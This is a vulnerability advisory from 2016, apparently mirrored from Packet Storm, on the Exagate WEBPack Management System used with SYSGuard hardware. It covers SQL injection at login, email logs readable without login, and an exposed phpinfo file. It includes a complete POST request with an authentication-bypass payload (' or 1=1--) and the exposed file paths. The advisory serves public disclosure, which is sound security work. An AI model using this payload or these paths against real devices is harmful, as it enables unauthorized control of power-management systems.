Lucene search
K

Exagate WEBPack Management System SQL Injection / Information Disclosure

🗓️ 07 Oct 2016 00:00:00Reported by Halil DalabasmazType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Exagate WEBpack Management System, Multiple Vulnerabilities, SQL Injection, Unauthorized Access, Configuration File Disclosur

Code
`Document Title:  
================  
Exagate WEBpack Management System Multiple Vulnerabilities  
  
Author:  
========  
Halil Dalabasmaz  
  
Release Date:  
==============  
07 OCT 2016  
  
Product & Service Introduction:  
================================  
WEBPack is the individual built-in user-friendly and skilled web  
interface allowing web-based access to the main units of the SYSGuard  
and POWERGuard series. The advanced software enables the users to  
design their customized dashboard smoothly for a detailed monitoring  
and management of all the power outlet sockets & sensor and volt free  
contact ports, as well as relay outputs. User definition and authorization,  
remote access and update, detailed reporting and archiving are among the  
many features.  
  
Vendor Homepage:  
=================  
http://www.exagate.com/  
  
Vulnerability Information:  
===========================  
Exagate company uses WEBPack Management System software on the hardware.  
The software is web-based and it is provide control on the hardware. There are  
multiple vulnerabilities on that software.  
  
Vulnerability #1: SQL Injection  
================================  
  
There is no any filtering or validation mechanisim on "login.php". "username"  
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST  
request is given below.  
  
POST /login.php HTTP/1.1  
Host: <TARGET HOST>  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 37  
  
username=root&password=' or 1=1--  
  
Vulnerability #2: Unauthorized Access To Sensetive Information  
===============================================================  
  
The software is capable of sending e-mail to system admins. But there is no  
any authorization mechanism to access e-mail logs. The e-mail logs can accessable  
anonymously from "http://<TARGET HOST>/emaillog.txt".  
  
Vulnerability #3: Unremoved Configuration Files  
================================================  
  
The software contains the PHP Info file on the following URL.  
  
http://<TARGET HOST>/api/phpinfo.php  
  
Vulnerability Disclosure Timeline:  
==================================  
03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities  
06 OCT 2016 - No response from vendor and re-attempted to contact vendor  
07 OCT 2016 - No response from vendor  
07 OCT 2016 - Public Disclosure  
  
Discovery Status:  
==================  
Published  
  
Affected Product(s):  
=====================  
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)  
  
Tested On:  
===========  
Exagate SYSGuard 3001  
  
Disclaimer & Information:  
==========================  
The information provided in this advisory is provided as it is without   
any warranty. BGA disclaims all warranties, either expressed or implied,  
including the warranties of merchantability and capability for a particular  
purpose. BGA or its suppliers are not liable in any case of damage, including  
direct, indirect, incidental, consequential loss of business profits or  
special damages.  
  
Domain: www.bgasecurity.com  
Social: twitter.com/bgasecurity  
Contact: [email protected]  
  
Copyright A(c) 2016 | BGA Security LLC  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation